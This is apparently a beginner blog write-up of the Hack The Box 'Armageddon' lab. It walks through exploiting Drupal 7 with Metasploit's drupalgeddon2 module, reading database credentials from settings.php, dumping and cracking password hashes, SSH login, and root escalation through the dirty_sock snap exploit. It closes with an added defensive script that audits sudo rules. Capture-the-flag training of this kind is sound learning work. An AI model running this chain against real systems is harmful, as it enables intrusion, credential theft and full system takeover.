ARMAGEDDON WRITE UP
In this section we are going to see the write-up for the Armageddon machine. First turn on your Hack The Box VPN, then let's start. Before that, please see the old (beginner) write-ups.
First load the IP address in the browser; you can see the website shown in the image.
This is the target machine we are going to attack.
So first we take an Nmap scan to look for interesting ports and services.
STEP 1: nmap -sC -sV 10.10.10.233
The result is given below.
In this Nmap scan we found two interesting services: SSH on its port, and a web server running Drupal 7.
Drupal 7 is the content management system (CMS) running the website, and this version has a known vulnerability. You can also see "Drupal 7" in the source code of the website.
So next open Metasploit using msfconsole.
STEP 2: use exploit/unix/webapp/drupal_drupalgeddon2
STEP 3: set rhost 10.10.10.233
STEP 4: set lhost tun0
For lhost use the VPN IP address only, or simply give tun0, which makes Metasploit take the VPN interface's IP.
STEP 5: run
Wait a couple of minutes and you will get a session.
Now we have the Meterpreter session, shown in the image.
There are many folders on this machine. I checked all of them but nothing was interesting, until I entered
cd /var/www/html/sites/default/ and ran ls to list the files.
There we find settings.php, so cat the file using the command below:
STEP 6: cat settings.php
Further checking this file, I got the MySQL username and password.
WHAT IS MYSQL?
MySQL is a database server; here it stores the site's sensitive information such as usernames and passwords, email IDs, etc.
Next we get a shell using the command below (type it in the Meterpreter session):
STEP 7: shell
Now you get a shell like this (shown in the image).
STEP 8: mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'
WARNING:
Type the query exactly, otherwise you get an error, and do not leave a space between -p and the password. Read it carefully.
Now we get the users and passwords. In this case the password is stored as a hash, so we are going to crack it using John the Ripper.
STEP 8: john hash.txt
Type john and give the file name.
In this scenario I have already cracked the password, as shown in the image below.
If you have already cracked the hash and want to show it again, give the command below:
STEP 9: john hash.txt --show
You get the username brucetherealadmin and the password booboo.
With the username and password from above we are now going to log in over SSH using these credentials.
We saw the SSH port open in the Nmap report, so now we log in:
STEP 10: ssh brucetherealadmin@10.10.10.233
It will ask for the password, so give booboo.
Now you have a shell on the machine.
Type ls to list the files.
BOOOOOOOOOOOOOOM !!!!
Now you get the user flag, which is in user.txt.
STEP 11: cat user.txt
Shown in the image below.
Next we are going to take the root flag using privilege escalation.
I checked manually using the command below:
STEP 12: sudo -l
Now you can see snap install.
In this case it runs with root access but needs no password.
Searching this on Google, I found the dirty_sock exploit.
You can download it using the link below:
Now we are going to exploit this machine using snap.
Copy and paste the file from GitLab.
NOTE:
Go back one directory using the cd .. command.
Then enter the tmp folder, because it has execute permission.
Here we are going to create the exploit.
I have saved the file as tamil.snap, shown in the picture above.
Use python3 (see the picture below).
STEP 13: sudo /usr/bin/snap install --devmode tamil.snap
By giving the above command the dirty_sock user will be installed.
STEP 14: su dirty_sock
It will ask for a password; the default password is dirty_sock.
NOTE: default username: dirty_sock, password: dirty_sock
STEP 15: sudo -i
Now it changes into the root user.
BOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM!!
STEP 16: cat root.txt
Now you get the root flag, which is in root.txt.
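The whole root path above comes from one sudoers rule: the user may run snap install as root with no password. Here is a defender-side audit script for exactly that misconfiguration (an added example, not part of the original write-up): it parses sudo -l output and flags rules that hand risky binaries to a user as root, with NOPASSWD raising the severity. The sample output, hostname and Defaults line are constructed.

```python
import re

# Constructed sample of "sudo -l" output, modelled on what the write-up
# describes: the user may run "snap install" as root with no password.
SAMPLE_SUDO_L = """\
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, env_reset

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
"""

# Binaries that should never be granted to ordinary users as root:
# each one installs or runs code with root privileges.
RISKY = {
    "/usr/bin/snap": "snap install runs package hooks as root (dirty_sock)",
    "ALL": "unrestricted root",
}

# Matches lines such as "(root) NOPASSWD: /usr/bin/snap install *"
# or "(ALL : ALL) NOPASSWD: ALL".
RULE_RE = re.compile(r"^\s*\((\S+)(?:\s*:\s*\S+)?\)\s*(NOPASSWD:)?\s*(.+?)\s*$")


def parse_sudo_rules(output):
    """Return (runas_user, nopasswd, command) tuples from `sudo -l` output."""
    rules, in_cmds = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True          # the rule lines follow this header
            continue
        if in_cmds and line.strip():
            m = RULE_RE.match(line)
            if m:
                rules.append((m.group(1), m.group(2) is not None, m.group(3)))
    return rules


def audit(output):
    """Flag rules granting risky binaries as root; NOPASSWD raises severity."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_rules(output):
        binary = cmd.split()[0]
        if runas in ("root", "ALL") and binary in RISKY:
            severity = "HIGH" if nopasswd else "MEDIUM"
            findings.append(f"{severity}: ({runas}) {cmd} -- {RISKY[binary]}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L):
        print(finding)
```

The fix on a real host is to remove the rule (or restrict snap to an allow-list of specific, reviewed packages) and require a password; the audit reports a clean sudoers as an empty list.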
I hope you understood this article. Please subscribe to my website and like, share, and comment. If you like our work and videos, please support us using the link below.